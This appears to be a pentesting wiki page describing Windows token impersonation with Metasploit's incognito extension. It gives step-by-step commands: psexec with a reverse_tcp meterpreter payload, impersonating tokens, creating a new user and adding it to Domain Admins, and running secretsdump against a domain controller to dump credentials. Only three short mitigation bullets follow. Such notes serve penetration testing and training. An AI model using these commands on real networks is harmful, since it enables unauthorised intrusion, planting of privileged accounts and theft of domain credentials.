Token Impersonation using Incognito

  1. Fire up metasploit

  2. Use exploit/windows/smb/psexec

  3. Set the following options

    1. Set rhosts

    2. Set smbdomain

    3. Set smbpass

    4. Set smbuser

    5. Set target 2

    6. Set payload windows/x64/meterpreter/reverse_tcp

If you get a meterpreter session as a result then do the following:

  1. load incognito

  2. list_tokens -u

  3. Select the token you want to impersonate using impersonate_token

# If you are able to impersonate a domain admin
# You can then add users 
net user /add USER_NAME PASSWORD /domain

# Make the user a domain admin 
net group "Domain Admins" USER_NAME /ADD /DOMAIN

# secretsdump the DC 
secretsdump.py DOMAIN/USER_NAME:'PASSWORD'@DC_IP_ADDRESS

Useful commands:

  • rev2self

  • getuid

Mitigation Strategies

  • Limit user / group token creation permissions

  • Account tiering

  • Local Admin restriction

PreviousPrint NightmareNextURL File Attack

Last updated